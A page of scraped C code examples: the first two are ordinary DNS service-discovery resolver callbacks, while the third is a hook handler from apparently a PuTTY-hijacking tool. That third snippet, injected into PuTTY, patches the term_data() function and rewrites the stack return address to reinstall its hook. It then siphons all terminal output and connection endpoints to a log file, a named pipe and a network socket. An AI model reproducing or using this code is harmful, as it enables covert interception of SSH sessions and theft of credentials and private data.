Exemple #1
0
static void
EmulatedResolverCallBack(
    struct sockaddr *				inInterfaceAddr,
    struct sockaddr *				inAddr,
    const char *					inTextRecord,
    DNSServiceDiscoveryReplyFlags	inFlags,
    void *							inContext )
{
    struct sockaddr_in *		ifSin4;
    struct sockaddr_in *		sin4;
    char						ifIP[ 64 ];
    char						ip[ 64 ];

    DNS_UNUSED( inFlags );
    DNS_UNUSED( inContext );

    ifSin4 	= (struct sockaddr_in *) inInterfaceAddr;
    sin4 	= (struct sockaddr_in *) inAddr;

    fprintf( stdout, "service resolved to %s:%d on interface %s with text \"%s\"\n",
             IPv4ToString( *( (DNSOpaque32 *) &sin4->sin_addr.s_addr ), ip ),
             ntohs( sin4->sin_port ),
             IPv4ToString( *( (DNSOpaque32 *) &ifSin4->sin_addr.s_addr ), ifIP ),
             inTextRecord ? inTextRecord : "" );
}
Exemple #2
0
static void ResolverCallBack( void *inContext, DNSResolverRef inRef, DNSStatus inStatusCode, const DNSResolverEvent *inEvent )
{
    char		ifIP[ 32 ];
    char		ip[ 32 ];

    DNS_UNUSED( inContext );
    DNS_UNUSED( inRef );
    DNS_UNUSED( inStatusCode );

    switch( inEvent->type )
    {
    case kDNSResolverEventTypeResolved:
    {
        const uint8_t *		p;
        const uint8_t *		end;
        int					i;

        fprintf( stdout, "resolved       \"%s.%s%s\" to \"%s\" (%s:%u) on interface 0x%p (%s)%s\n",
                 inEvent->data.resolved.name,
                 inEvent->data.resolved.type,
                 inEvent->data.resolved.domain,
                 inEvent->data.resolved.hostName,
                 IPv4ToString( inEvent->data.resolved.address.u.ipv4.addr, ip ),
                 ( inEvent->data.resolved.address.u.ipv4.port.v8[ 0 ] << 8 ) |
                 inEvent->data.resolved.address.u.ipv4.port.v8[ 1 ],
                 (int) inEvent->data.resolved.interfaceID,
                 IPv4ToString( inEvent->data.resolved.interfaceIP.u.ipv4.addr, ifIP ),
                 ( inEvent->data.resolved.textRecordRawSize > 0 ) ? " with text:" : "" );

        p 	= (const uint8_t *) inEvent->data.resolved.textRecordRaw;
        end = p + inEvent->data.resolved.textRecordRawSize;
        i 	= 0;

        if( gPrintTXTRecords )
        {
            while( p < end )
            {
                uint8_t		size;

                size = *p++;
                if( ( p + size ) > end )
                {
                    fprintf( stdout, "\n### MALFORMED TXT RECORD (length byte too big for record)\n\n" );
                    break;
                }
                fprintf( stdout, "%5d (%3d bytes): \"%.*s\"\n", i, size, size, p );
                p += size;
                ++i;
            }
            fprintf( stdout, "\n" );
        }
        break;
    }

    case kDNSResolverEventTypeRelease:
        break;

    default:
        break;
    }
}
Exemple #3
0
/* This is the handler function that is called after hooking term_data()
 * Original function declaration is:
 * - int term_data(Terminal *term, int is_stderr, const char *data, int len)
 * The original function handles data received from the server side and which should be 
 * displayed in the main Putty window
 */
INT TermDataHandler(VOID* term, INT is_stderr, CHAR* data, INT len)
{
    INT     i;
    INT*    oldEIPAddr;
    INT     (*term_data)(VOID*, INT, CHAR*, INT);
    INT     res;
    CHAR    ipAddr1[BUFSIZE];
    CHAR    ipAddr2[BUFSIZE];
    MIB_TCPROW_OWNER_PID    connInfo;
    
    /* First repair the original function code but 
     * ensure that we can reinstall the hook after its execution 
     */

    /* Save old EIP of original function to oldEIPTermData */
    __asm mov oldEIPAddr, EBP;
    oldEIPAddr += 1;              /* oldEIPAddr += 1 * sizeof(int*) */
    oldEIPTermData = (DWORD)*oldEIPAddr;
    
    if (bEjectDLL == FALSE) {
        /* Replace old EIP with a pointer to our code which will reinstall the hook */
        *oldEIPAddr = (DWORD)ReinstallHookTermData;
    }
    /* Restore original function bytes in order to be usable */
    for(i = 0; i < 9; i++) {
        ((UCHAR*)pTermData)[i] = termDataBytes[i];
    }

    
    /* Do something useful with the data */
    if (len > 0) {
        /* Send connection information first */
        if (connInfoSent == FALSE) {
            if (GetEstablishedConnOfPid(processID, &connInfo) == FALSE) {
                sprintf(buffer, "[-] [%i] Could not get information about established connections\n", processID);
                WritePipeMessage(logPipe, buffer);
            } else {
                IPv4ToString(connInfo.dwLocalAddr, ipAddr1, BUFSIZE);
                sprintf(buffer, "[+] [%i] Local  endpoint: %s:%i\n", processID, ipAddr1, ntohs(connInfo.dwLocalPort));
                WritePipeMessage(logPipe, buffer);
                if (strlen(logFileName) > 0) {
                    fwrite(buffer, strlen(buffer), 1, logFd);
                }
                if (gsock > 0) {
                    send(gsock, buffer, strlen(buffer), 0);
                }

                IPv4ToString(connInfo.dwRemoteAddr, ipAddr2, BUFSIZE);
                sprintf(buffer, "[+] [%i] Remote endpoint: %s:%i\n", processID, ipAddr2, ntohs(connInfo.dwRemotePort));
                WritePipeMessage(logPipe, buffer);
                if (strlen(logFileName) > 0) {
                    fwrite(buffer, strlen(buffer), 1, logFd);
                }
                if (gsock > 0) {
                    send(gsock, buffer, strlen(buffer), 0);
                }
            }
            connInfoSent = TRUE;
        }
        
        if (strlen(logFileName) > 0) { 
            fwrite(data, len, 1, logFd);
        }
        if (gsock > 0) {
            send(gsock, data, len, 0);
        }

        sprintf(buffer, "[+] [%i] term_data(): ", processID);
        if (len > BUFSIZE - 50) {
            strncat(buffer, data, BUFSIZE - 50);
        } else {
            strncat(buffer, data, len);
        }
        strcat(buffer, "\n");
        WritePipeMessage(logPipe, buffer);
        
        /* Discard keyPressBuf because it is already echoed back by the server */
        keyPressBuf[0] = 0;                    
    }
    
    if (outputDisabled == FALSE) {
        if (bPuttyWindowConnected == TRUE) {
            /* Call original function */
            term_data = (INT(*)(VOID*, INT, CHAR*, INT))pTermData;
            res = term_data(term, is_stderr, data, len);
        } else {
            res = 0;
        }
    } else {
        /* Skip calling original term_data() outputDisabledCount times */
        res = 0;
        
        outputDisabledCount--;
        if (outputDisabledCount == 0) {
            EnablePuttyOutput();
        }
    }

    return res;
}